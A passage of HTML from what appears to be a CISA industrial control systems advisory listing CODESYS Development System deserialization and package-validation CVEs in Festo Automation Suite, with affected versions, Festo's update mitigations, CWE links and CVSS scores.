<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2021-21864</a></h3>
<div class="csaf-accordion-content">
<p>A unsafe deserialization vulnerability exists in the ComponentModel ComponentManager.StartupCultureSettings functionality of CODESYS GmbH CODESYS Development System 3.5.16 and 3.5.17. A specially crafted file can lead to arbitrary command execution. An attacker can provide a malicious file to trigger this vulnerability.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2021-21864">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/50.html">CWE-50 Path Equivalence: '//multiple/leading/slash'</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2021-21865</a></h3>
<div class="csaf-accordion-content">
<p>A unsafe deserialization vulnerability exists in the PackageManagement.plugin ExtensionMethods.Clone() functionality of CODESYS GmbH CODESYS Development System 3.5.16. A specially crafted file can lead to arbitrary command execution. An attacker can provide a malicious file to trigger this vulnerability.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2021-21865">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/502.html">CWE-502 Deserialization of Untrusted Data</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2021-21866</a></h3>
<div class="csaf-accordion-content">
<p>A unsafe deserialization vulnerability exists in the ObjectManager.plugin ProfileInformation.ProfileData functionality of CODESYS GmbH CODESYS Development System 3.5.16 and 3.5.17. A specially crafted file can lead to arbitrary command execution. An attacker can provide a malicious file to trigger this vulnerability.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2021-21866">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/502.html">CWE-502 Deserialization of Untrusted Data</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2021-21867</a></h3>
<div class="csaf-accordion-content">
<p>An unsafe deserialization vulnerability exists in the ObjectManager.plugin ObjectStream.ProfileByteArray functionality of CODESYS GmbH CODESYS Development System 3.5.16 and 3.5.17. A specially crafted file can lead to arbitrary command execution. An attacker can provide a malicious file to trigger this vulnerability.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2021-21867">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/50.html">CWE-50 Path Equivalence: '//multiple/leading/slash'</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2021-21868</a></h3>
<div class="csaf-accordion-content">
<p>An unsafe deserialization vulnerability exists in the ObjectManager.plugin Project.get_MissingTypes() functionality of CODESYS GmbH CODESYS Development System 3.5.16 and 3.5.17. A specially crafted file can lead to arbitrary command execution. An attacker can provide a malicious file to trigger this vulnerability.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2021-21868">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/50.html">CWE-50 Path Equivalence: '//multiple/leading/slash'</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2021-21869</a></h3>
<div class="csaf-accordion-content">
<p>An unsafe deserialization vulnerability exists in the Engine.plugin ProfileInformation ProfileData functionality of CODESYS GmbH CODESYS Development System 3.5.16 and 3.5.17. A specially crafted file can lead to arbitrary command execution. An attacker can provide a malicious file to trigger this vulnerability.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2021-21869">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/502.html">CWE-502 Deserialization of Untrusted Data</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2021-29239</a></h3>
<div class="csaf-accordion-content">
<p>CODESYS Development System 3 before 3.5.17.0 displays or executes malicious documents or files embedded in libraries without first checking their validity.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2021-29239">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/345.html">CWE-345 Insufficient Verification of Data Authenticity</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2021-29240</a></h3>
<div class="csaf-accordion-content">
<p>The Package Manager of CODESYS Development System 3 before 3.5.17.0 does not check the validity of packages before installation and may be used to install CODESYS packages with malicious content.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2021-29240">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
